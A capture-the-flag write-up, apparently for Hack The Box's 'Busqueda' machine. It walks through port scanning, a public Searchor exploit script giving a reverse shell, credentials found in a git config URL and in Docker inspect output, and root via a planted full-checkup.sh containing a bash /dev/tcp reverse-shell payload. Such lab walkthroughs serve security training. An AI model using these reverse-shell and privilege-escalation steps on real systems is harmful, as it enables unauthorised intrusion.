Box: Busqueda
Level: Easy
OS: Linux
Lets get started
Recon
PortScanning
command:sudo nmap -A 10.129.78.165 -v -p- -T4
Nmap scan report for searcher.htb (10.129.78.185)
Host is up (0.34s latency).
Not shown: 65369 closed tcp ports (reset), 164 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open http Apache httpd 2.4.52
| http-server-header:
| Apache/2.4.52 (Ubuntu)
|_ Werkzeug/2.1.2 Python/3.10.6
| http-methods:
|_ Supported Methods: HEAD GET OPTIONS
|_http-title: Searcher
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=10/30%OT=22%CT=1%CU=43868%PV=Y%DS=2%DC=T%G=Y%TM=653FBF
OS:10%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)SE
OS:Q(SP=104%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10A%TI=Z
OS:%CI=Z%II=I%TS=A)SEQ(SP=107%GCD=1%ISR=109%TI=Z%CI=Z%TS=A)OPS(O1=M53CST11N
OS:W7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CS
OS:T11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=4
OS:0%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(
OS:R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 11.571 days (since Thu Oct 19 01:53:13 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 446.93 ms 10.10.14.1
2 447.06 ms searcher.htb (10.129.78.185)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 30 15:34:56 2023 -- 1 IP address (1 host up) scanned in 1764.04 seconds
From our nmap scan we have 2 open ports, port 22 which runs ssh and port 80 which runs http. Our enumeration today will be focused on port 80
Enumeration
Navigate to the webpage
We’ll add this domain name to our /etc/hosts file
Now lets navigate back to the webpage
Scrolling down,
Take a look at the version of searchor running on this machine
Checking google
Lets exploit this
Exploitation
We will be using this github exploit
Download this to your machine and make it executable
command:chmod +x exploit.sh
┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/busqueda]
└─$ chmod +x exploit.sh
┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/busqueda]
└─$ ls -l exploit.sh
-rwxr-xr-x 1 bl4ck4non bl4ck4non 866 Oct 30 15:33 exploit.sh
To run the exploit script
command:./exploit.sh searcher.htb LHOST LPORT
Ensure you set your netcat listener before running this command
Nice, we spawned a reverse shell. To stabilize this shell
python3 -c “import pty;pty.spawn(‘/bin/bash’)”
ctrl + z (to background)
stty raw -echo && fg
export TERM=xterm
Lets go ahead to escalate our privileges
Privilege Escalation
The directory /var/www/app contains a .git folder
Inside the folder
That url looks weird actually, there was nothing interesting there when I checked though.
Looking at the way the url was structured, there was something like this cody:jh1usoih2bkjaspwe92@gitea.searcher.htb. This part of the url cody:jh1usoih2bkjaspwe92 actually looks like a username and password.
Lets run the sudo -l command, then we try the password jh1usoih2bkjaspwe92 for the svc user
nice nice, it worked. Also, you can see that we have sudo privileges to run the script /opt/scripts/system-checkup.py.
Checking out the content of the script
oops, we actually can’t view the content of the script, we don’t have enough privileges for that. One thing we can try to do is execute the script
As you can see from the above screenshot that args are needed to run this script.
If we try to do a full-checkup we get this
Lets test the other args
command:sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
command:sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect
You can see fom the above screenshot that the argument docker-inspect actually stands out.
Reading this documentation I saw that we get a subsection in JSON format.
So, to use docker-inspect we have to specify the container_id. To get the container_id we can use the arg docker-ps
command:sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
We’ll be using those container ids
command:sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '' 960873171e2e
cool, we were able to get the creds for a database gitea
Lets dump the content of the other container id
command:sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '' f84a6b33fb5a
nice nice, we got creds from this container also
We can login as the administrator user on gitea using those passwords we found in the containers.
First lets add the subdomain gitea.searcher.htb to our /etc/hosts file
Navigating to the subdomain
username:administrator password:yuiu1hoiu4i5ho1uh
nice nice, we are in.
Lets check the scripts
Checking the content of the script I found this
This means to run the action full-checkup a file full-checkup.sh is being executed.
We can exploit this by creating a malicious bash script that can help us get a reverse shell back to our machine
payload
#!/bin/bash
bash -i >& /dev/tcp/LHOST/LPORT 0>&1
Save this in a file full-checkup.sh, then give it executable permission using the command chmod +x full-checkup.sh.
Ensure you edit the LHOST and LPORT
Now, lets run the full-checkup command again, this time we’ll set up our netcat listener for incoming connections
command:sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
We spawned a shell as the root user😎
That will be all for today
Back To Home